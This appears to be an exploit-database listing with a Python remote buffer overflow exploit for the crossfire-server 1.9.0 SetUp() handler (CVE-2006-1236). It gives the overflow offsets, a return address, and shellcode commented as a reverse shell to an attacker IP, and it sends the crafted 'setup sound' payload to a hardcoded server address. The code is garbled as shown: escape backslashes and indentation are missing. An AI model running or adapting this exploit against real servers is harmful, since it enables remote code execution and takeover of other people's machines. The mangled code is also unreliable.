Authored by Khaled Salem

Crossfire Server version 1.0 SetUp() remote buffer overflow exploit.

advisories | CVE-2006-1236

# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236

#!/bin/python
import socket
import time


# Crash at 4379
# EIP Offset at 4368
# Badchar x00x20
# ECX Size 170
# CALL ECX 0x080640eb

size = 4379

# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"xd9xeexd9x74x24xf4xb8x60x61x5fx28"
shellcode += b"x5bx33xc9xb1x12x31x43x17x03x43x17"
shellcode += b"x83xa3x65xbdxddx12xbdxb6xfdx07x02"
shellcode += b"x6ax68xa5x0dx6dxdcxcfxc0xeex8ex56"
shellcode += b"x6bxd1x7dxe8xc2x57x87x80xabxa7x77"
shellcode += b"x51x3cxaax77x50x07x23x96xe2x11x64"
shellcode += b"x08x51x6dx87x23xb4x5cx08x61x5ex31"
shellcode += b"x26xf5xf6xa5x17xd6x64x5fxe1xcbx3a"
shellcode += b"xccx78xeax0axf9xb7x6d"




try:
filler = "x90"*(4368 - 170) + shellcode+"x90"*(170-len(shellcode))
EIP = "xebx40x06x08"
padding = "C" * (4379 - len(filler) - len(EIP))
payload = filler + EIP + padding
inputBuffer = "x11(setup sound "+ payload +"x90x00#"
print("Sending Buffer with size:" + str(len(payload)))
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
print(s.recv(1024))

s.send(inputBuffer)
s.close()

except:
print("Could not connect")
exit(0)